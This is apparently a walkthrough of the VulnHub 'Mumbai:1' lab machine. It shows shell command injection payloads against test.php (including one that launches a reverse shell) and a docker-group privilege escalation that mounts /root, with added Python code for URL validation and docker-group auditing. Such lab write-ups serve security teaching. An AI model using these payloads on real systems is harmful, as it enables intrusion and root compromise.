Target machine:
https://www.vulnhub.com/entry/mumbai-1,372/
Host discovery:
Host port scan:
Download the Note file via FTP
TODO:
Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
secure - maybe this will shut those security researchers up.
Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
rebuild the server again.
- AbsoZed
This means docker can be used for privilege escalation, since the HTTP services are running inside docker containers.
HTTP directory scan
http://10.10.203.18/drupal/
Directory listing is empty
http://10.10.203.18/wordpress/ cannot be accessed
Next, enumerate HTTP on port 8000
dirb http://10.10.203.18:8000 -X .php,.txt,.json,.xml,.py,.yml
+ http://10.10.203.18:8000/keywords.py (CODE:200|SIZE:1376)
+ http://10.10.203.18:8000/test.php (CODE:200|SIZE:64)
Download both files and inspect their contents
test.php contents:
Please POST a proper query. ex: https://caffeinatedengineers.com
keywords.py is a Python script that sends a request to the supplied URL
Try requesting a few useful URLs
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
root at Hack404 in ~
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)
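The output above shows that test.php hands the POSTed query to keywords.py through a shell, so a ";" after the URL runs a second command. The following is an added example (not the target's source, whose code the writeup does not show) of how such a handler should pass the URL on: build an argv list so no shell ever parses the value, and allow-list the input as a plain http(s) URL before use. The script path, the function names and the "python3" interpreter are assumptions.

```python
"""Hardened handling of a user-supplied URL before it is handed to a
keyword-counting script (the test.php / keywords.py pattern above).
Added example; KEYWORDS_SCRIPT and the function names are assumed."""
import shlex
import subprocess
from urllib.parse import urlsplit

KEYWORDS_SCRIPT = "/var/www/html/keywords.py"  # assumed path, not from the page

# Characters that are never part of a URL we are willing to fetch; ';' is
# exactly what turned "query=<url>;id" into a second command on the target.
FORBIDDEN = set(";|&`$<>()\"'\\\n\r\t ")


def validate_query_url(query: str) -> str:
    """Return the query unchanged if it is an absolute http(s) URL with no
    shell metacharacters, otherwise raise ValueError."""
    if not query or any(c in FORBIDDEN for c in query):
        raise ValueError("query contains characters that are not part of a URL")
    parts = urlsplit(query)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("query must be an absolute http(s) URL")
    return query


def build_command(query: str) -> list:
    """Build the argv list for the keyword script.  Because the URL is one
    list element, nothing inside it is interpreted by a shell."""
    url = validate_query_url(query)
    return ["python3", KEYWORDS_SCRIPT, url]


def quote_for_shell(value: str) -> str:
    """If a shell string cannot be avoided (the PHP equivalent is
    escapeshellarg), quote the value so ';' stays literal data."""
    return shlex.quote(value)


def run_keywords(query: str) -> str:
    """Run the script without shell=True and return its stdout."""
    cmd = build_command(query)
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


# Vulnerable counterpart, shown only for contrast.  The target's behaviour
# is equivalent to running the concatenated string through a shell:
#   subprocess.run("python3 keywords.py " + query, shell=True)
# where the ';' in the query ends the intended command and starts "id".
```

build_command rejects the injected query while accepting the legitimate one; quote_for_shell shows the fallback when a shell string is unavoidable.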
Listen locally on port 1234
Run: curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php
Got a shell; now try privilege escalation
docker run -v /root:/mnt -it alpine
# cd /root/
cd /root/
~ # cd /mnt
cd /mnt
/mnt # ls
ls
proof.txt
/mnt # cat proof.txt
OVER !!
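The escalation above works only because apiuser is in the docker group (groups=...,115(docker)), which lets it mount /root into a container. An added defender's check, not part of this writeup: audit /etc/group and /etc/passwd for any non-root account that has docker as a primary or supplementary group. The sample file contents below are constructed to match the uid/gid seen on the target; the function names are assumptions.

```python
"""Flag accounts that belong to the docker group.  Such accounts can start
a container with the host filesystem mounted, so membership is effectively
root.  Added example; the sample /etc/group and /etc/passwd are constructed."""

SAMPLE_ETC_GROUP = """root:x:0:
sudo:x:27:
docker:x:115:apiuser
apiuser:x:1001:
"""

SAMPLE_ETC_PASSWD = """root:x:0:0:root:/root:/bin/bash
apiuser:x:1001:1001::/home/apiuser:/bin/bash
www-data:x:33:33::/var/www:/usr/sbin/nologin
"""


def parse_group(text: str) -> dict:
    """Map group name -> (gid, [supplementary members]) from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        name, _pw, gid, members = fields[:4]
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def parse_passwd(text: str) -> dict:
    """Map user name -> primary gid from /etc/passwd text."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        users[fields[0]] = int(fields[3])
    return users


def docker_group_accounts(group_text: str, passwd_text: str, group: str = "docker") -> list:
    """Return sorted non-root accounts that have `group` as primary or
    supplementary group; an empty list means nothing to report."""
    groups = parse_group(group_text)
    if group not in groups:
        return []
    gid, supplementary = groups[group]
    found = {u for u in supplementary if u != "root"}
    for user, primary_gid in parse_passwd(passwd_text).items():
        if primary_gid == gid and user != "root":
            found.add(user)
    return sorted(found)


def audit_system() -> list:
    """Run the same check against the live host files."""
    with open("/etc/group") as g, open("/etc/passwd") as p:
        return docker_group_accounts(g.read(), p.read())


if __name__ == "__main__":
    for account in docker_group_accounts(SAMPLE_ETC_GROUP, SAMPLE_ETC_PASSWD):
        print(f"{account}: member of docker group (root-equivalent via container mounts)")
```

Any account the audit reports should be removed from the docker group, or the daemon moved to rootless mode or fronted by an authorization plugin, since a volume mount of / from such an account is equivalent to root on the host.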